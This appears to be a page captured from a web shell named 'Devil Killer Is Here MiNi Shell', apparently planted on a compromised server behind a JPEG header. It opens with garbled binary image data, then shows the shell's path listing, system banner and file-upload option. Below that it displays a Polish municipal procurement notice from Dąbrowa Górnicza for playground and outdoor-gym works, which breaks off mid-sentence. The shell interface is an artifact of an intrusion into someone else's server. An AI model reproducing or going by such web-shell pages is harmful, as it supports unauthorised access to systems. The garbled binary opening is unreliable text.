JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20191004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20191004/604980-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 604980-N-2019 z dnia 2019-10-04 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Dąbrowa Górnicza</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">A. ,, Siłownia pod chmurką" B. ,, Zakątek dla aktywnych" C. ,, Doposażenie placu zabaw na os. Mickiewicza między blokami 34 i 36" D. ,, Raj dla dzieci - rewitalizacja placyku dla najmłodszych" E. ,, Modernizacja placu zabaw" F. ,, Zakątek rekreacyjny przy szkole" G. ,, Zagospodarowanie terenu wokół remizy OSP" H. ,, Zagospodarowanie przestrzeni w pobliżu boiska LKS Promień"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Dąbrowa Górnicza</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27625531200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Graniczna</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">21</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">41-300</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Dąbrowa Górnicza</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">śląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">322 956 700</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia_publiczne@dabrowa-gornicza.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">32 2625032, 2956700</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bip.dabrowa-gornicza.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.dabrowa-gornicza.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.dabrowa-gornicza.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">piseminie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miejski, ul. Graniczna 21, 41-300 Dąbrowa Górnicza, POK stanowisko 13</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">A. ,, Siłownia pod chmurką" B. ,, Zakątek dla aktywnych" C. ,, Doposażenie placu zabaw na os. Mickiewicza między blokami 34 i 36" D. ,, Raj dla dzieci - rewitalizacja placyku dla najmłodszych" E. ,, Modernizacja placu zabaw" F. ,, Zakątek rekreacyjny przy szkole" G. ,, Zagospodarowanie terenu wokół remizy OSP" H. ,, Zagospodarowanie przestrzeni w pobliżu boiska LKS Promień"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.WIR.271.4.37.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Postępowanie o udzielenie zamówienia o wartości poniżej 5 548 000 zł.I. Zakres zamówienia:ZADANIE A. ,, Siłownia pod chmurką"Zadanie polega na przygotowaniu terenu pod wykonanie siłowni zewnętrznej wraz z infrastrukturą towarzyszącą, poszerzenie oraz remont schodów terenowych oraz wykonanie nawierzchni alejek i placyków w Dąbrowie Górniczej przy Al. Zwycięstwa 81 na działkach nr 2776 i 2659/8 ark.4 (obręb: Ząbkowice). Roboty w zakresie zagospodarowania terenu obejmują dostawę i montaż trzech podwójnych urządzeń do siłowni zewnętrznej tj. narciarz/twister, biegacz/prasa nożna, wioślarz/rower wraz z wykonaniem pod nimi nawierzchni z kostki betonowej, montaż elementów małej architektury tj. ławki (3 szt.) i kosze na odpady (3 szt.), remont istniejących schodów terenowych, wykonanie nawierzchni alejek i placyków oraz nasadzenie zieleni (zakres prac opisany w przedmiarze robót).ZADANIE B. ,,Zakątek dla aktywnych"Zadanie polega na przygotowaniu terenu pod wykonanie siłowni zewnętrznej wraz z infrastrukturą towarzyszącą oraz nasadzenie zieleni w Dąbrowie Górniczej przy ul. Armii Krajowej 38 na działkach nr 927/70 i 927/71 ark.5 (obręb: Ząbkowice). Roboty w zakresie zagospodarowania terenu obejmują dostawę i montaż siedmiu podwójnych urządzeń do siłowni zewnętrznej tj. twister/stepper, biegacz/orbitrek, wioślarz/narty biegówki, wyciskanie siedząc/wyciąg górny, orbitrek/wahadło, biegacz/prasa nożna, drążki gimnastyczne/drążki do podciągania wraz z wykonaniem pod nimi nawierzchni z kostki betonowej, zamontowanie piłkochwytu obok boiska, montaż elementów małej architektury tj. ławki (2 szt.) i kosz na odpady (1 szt.) oraz nasadzenie zieleni (zakres prac opisany w przedmiarze robót).ZADANIE C. ,,Doposażenie placu zabaw na os. Mickiewicza między blokami 34 i 36"Zadanie polega na przygotowaniu terenu w zakresie niezbędnym do doposażenia placu zabaw w Dąbrowie Górniczej pomiędzy blokami 34 i 36 przy ul. Mickiewicza oraz blokiem nr 1 przy ul. Krasińskiego na działce nr 83 ark.84 (obręb: Dabrowa Górnicza). Roboty w zakresie zagospodarowania terenu obejmują dostawę i montaż urządzeń zabawowych tj. urządzenie modułowe - wieża wspinaczkowa ze zjeżdżalnią, karuzela ,,Trzmiel", urządzenie linarne ,,Choinka" wraz z wykonaniem pod urządzeniem linarnym i modułowym nawierzchni bezpiecznej oraz demontaż i przeniesienie w inne miejsce urządzenia zabawowego ,,Kiwak"- 2 szt., montaż elementów małej architektury tj. ławka (1 szt.) i tablice edukacyjne (3 szt.) (zakres prac opisany w przedmiarze robót).ZADANIE D. ,,Raj dla dzieci - rewitalizacja placyku dla najmłodszych"Zadanie polega na przygotowaniu terenu w zakresie niezbędnym do doposażenia placu zabaw w Dąbrowie Górniczej przy ul. Kuźniczka Nowa 48 na działkach nr 272 ark.4 oraz 271 ark.4 (obręb: Kuźniczka). Roboty w zakresie zagospodarowania terenu obejmują dostawę i montaż urządzeń zabawowych tj. urządzenie modułowe ze zjeżdżalnią, karuzela ,,Trzmiel", urządzenie linarne ,,Dwie sieci" oraz demontaż urządzeń zabawowych: piaskownica, bujak kaczka, trap oraz huśtawka ze zjeżdżalnią (zakres prac opisany w przedmiarze robót).ZADANIE E. ,,Modernizacja placu zabaw"Zadanie polega na przygotowaniu terenu w zakresie niezbędnym do doposażenia placu zabaw w Dąbrowie Górniczej przy ul. Topolowej na działce nr 58/8 ark.13 (obręb: Dąbrowa Górnicza). Roboty w zakresie zagospodarowania terenu obejmują dostawę i montaż urządzeń zabawowych tj. Zestaw rekreacyjno-modułowy, podwójna piaskownica połączona rurą, kiwak - 2 szt., huśtawka wagowa konik, ścianka do malowania z prostymi grami, karuzela ,,Trzmiel", huśtawka ,,Bocianie gniazdo", huśtawka podwójna wraz z wykonaniem pod zestawem rekreacyjno-modułowym nawierzchni bezpiecznej z mat przerostowych oraz demontaż urządzeń zabawowych tj.: sześcian wspinaczkowy, piaskownica, trap, huśtawka ważka, pociąg, drabinka wspinaczkowa, zjeżdżalnia + piaskownica, huśtawka podwójna (zakres prac opisany w przedmiarze robót).ZADANIE F. ,,Zakątek rekreacyjny przy szkole"Zadanie polega na przygotowaniu terenu pod wykonanie siłowni zewnętrznej ze stołem do ping-ponga oraz stołem do gry w szachy oraz placu zabaw wraz z elementami małej architektury w Dąbrowie Górniczej przy ul. B. Prusa 3 przy ZSO nr 2 na działce nr 17/1 ark.64 (obręb: Dąbrowa Górnicza). Roboty w zakresie zagospodarowania terenu obejmują dostawę i montaż czterech podwójnych urządzeń do siłowni zewnętrznej tj. twister/stepper, biegacz/orbitrek, wioślarz/narty biegówki, wyciskanie siedząc/wyciąg górny wraz z wykonaniem pod nimi nawierzchni z kostki betonowej, dostawę i montaż urządzeń zabawowych tj.: mały zestaw zabawowy, piaskownica, kiwak oraz huśtawka pojedyncza, dostawę i montaż stołu do ping-ponga oraz stołu do gry w szachy, montaż elementów małej architektury tj. ławki (2 szt.) i kosz na odpady (1 szt.), regulamin siłowni (1szt.), regulamin placu zabaw (1szt.) (zakres prac opisany w przedmiarze robót).ZADANIE G. ,,Zagospodarowanie terenu wokół remizy OSP"Zadanie polega na przygotowaniu terenu w zakresie niezbędnym do doposażenia istniejącego placu zabaw wraz z elementami małej architektury oraz wykonania siłowni zewnętrznej, budowy paleniska z betonowym stołem oraz utwardzeniem nawierzchni w Dąbrowie Górniczej przy ul. Kwiatowej na działkach nr 275/4 ark. 4 (obręb: Ujejsce). Roboty w zakresie zagospodarowania terenu obejmują dostawę i montaż trzech podwójnych urządzeń do siłowni zewnętrznej tj. rowerek/wioślarz, twister/pajac, narciarz/jeździec wraz z wykonaniem pod nimi nawierzchni z kostki betonowej, dostawę i montaż dwóch sztuk przestawnych bramek stalowych na istniejącym boisku, montaż elementów małej architektury tj. ławki (9 szt.), regulamin siłowni (1szt.), budowę paleniska wraz z betonowym stołem oraz utwardzeniem nawierzchni. Doposażenie placu zabaw w huśtawkę wahadłową na nawierzchni bezpiecznej z mat przerostowych (zakres prac opisany w przedmiarze robót).ZADANIE H. ,,Zagospodarowanie przestrzeni w pobliżu boiska LKS Promień"Zadanie polega na przygotowaniu terenu pod wykonanie siłowni zewnętrznej wraz z elementami małej architektury, wytyczenie i utwardzenie alejek parkowych w Dąbrowie Górniczej na działce nr 1253 ark. 39 (obręb: Strzemieszyce Małe). Roboty w zakresie zagospodarowania terenu obejmują dostawę i montaż trzech podwójnych urządzeń do siłowni zewnętrznej tj. wioślarz/rower, biegacz/prasa nożna wraz z wykonaniem pod nimi nawierzchni z kostki betonowej, montaż elementów małej architektury tj. ławki (7 szt.), kosze na odpady (3 szt.), regulamin do siłowni zewnętrznej (1szt.), wykonanie alejek z nawierzchni żwirowej oraz nasadzenie zieleni (zakres prac opisany w przedmiarze robót).Wszelkie prace mają być wykonane zgodnie z załączoną do postępowania dokumentacją techniczną. II.Wymagania ogólne dotyczące zadań od A do H1.Wszystkie dostarczone i zamontowane urządzenia:- zabawowe przewidziane do montażu winny posiadać ważne certyfikaty zgodności z normą PN - EN 1176 wydane przez niezależną jednostkę certyfikującą lub dokumenty równoważne w kraju zrzeszonym w Unii Europejskiej, a w przypadku państw spoza Unii Europejskiej dokument/y równoważne (ZADANIE C, D, E, F, G),- do wszystkich użytych nawierzchni bezpiecznych z mat przerostowych ważny certyfikat zgodności z normą PN - EN 1177 wydany przez niezależną jednostkę certyfikującą lub dokument równoważny w kraju zrzeszonym w Unii Europejskiej, a w przypadku państw spoza Unii Europejskiej dokument/y równoważne (ZADANIE C, E, G), - do siłowni zewnętrznych winny posiadać ważne certyfikaty zgodności z normą PN - EN 16630 wydane przez niezależną jednostkę certyfikującą lub dokument równoważny w kraju zrzeszonym w Unii Europejskiej, a w przypadku państw spoza Unii Europejskiej dokument/y równoważne (ZADANIE A, B, F, G, H),- do wszystkich użytych nawierzchni bezpiecznych z mat przerostowych winny posiadać atest higieniczny PZH lub dokument równoważny (ZADANIE C, E, G),-dostarczany piasek winien posiadać atest PZH lub dokument równoważny (ZADANIE E,F).Uwaga: Wykonawca, który z przyczyn niezależnych od niego, nie ma możliwości uzyskania dokumentów, o których mowa w pkt. 3.4. SIWZ, może złożyć inne dokumenty dotyczące odpowiednio zapewnienia jakości lub środków zarządzania środowiskowego, potwierdzające stosowanie przez wykonawcę środków zapewnienia jakości zgodnych z wymaganymi normami zapewniania jakości lub środków zarządzania środowiskowego równoważnych środkom wymaganym na mocy mającego zastosowanie systemu lub norm zarządzania środowiskowego.III. Roboty należy zrealizować na podstawie:- dokumentacji technicznej: projektu budowlano-wykonawczego, przedmiaru robót i specyfikacji technicznej wykonania i odbioru robót budowlanych,- wymogów Specyfikacji Istotnych Warunków Zamówienia wraz z projektem umowy,- zasad wiedzy technicznej, sztuki budowlanej i przepisów prawa.IV. Zamówienie musi być realizowane zgodnie z:1. Ustawą z dnia 7 lipca 1994 roku Prawo budowlane (Dz.U. z 2018r., poz. 1202 z późn. zm.), 2. Rozporządzeniem Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy(Dz.U. z 2003 r. Nr 169,poz.1650 tj. z późn. zm.). V. Rozwiązania równoważne:1.	Przedmiotu zamówienia nie można opisywać przez wskazanie znaków towarowych, patentów lub pochodzenia, źródła lub szczególnego procesu, który charakteryzuje produkty lub usługi dostarczane przez konkretnego wykonawcę, jeżeli mogłoby to doprowadzić do uprzywilejowania lub wyeliminowania niektórych wykonawców lub produktów, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia i zamawiający nie może opisać przedmiotu zamówienia za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy ,,lub równoważny.2.	W związku z powyższym Wykonawcy mogą składać oferty równoważne w stosunku do przedmiotu zamówienia przedstawionego w SIWZ - zgodnie z art. 30 ust. 4 i 5 ustawy Pzp. 3.	Opisując przedmiot zamówienia przez odniesienie do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa w ust. 1 pkt 2 i ust. 3 Ustawy, Zamawiający dopuszcza rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą wyrazy ,,lub równoważne".4.	Zgodnie z art. 30 ust. 5 ustawy Pzp ,,Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego". Równoważność pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych ma w szczególności zapewnić uzyskanie parametrów technicznych nie gorszych od założonych w niniejszej SIWZ.5.	Zamawiający wymaga zastosowania materiałów, urządzeń lub rozwiązań technicznych o parametrach równoważnych lub wyższych pod względem parametrów technicznych, użytkowych oraz eksploatacyjnych pod warunkiem, że zagwarantują one realizację robót w zgodzie z wydanym pozwoleniem na budowę oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w 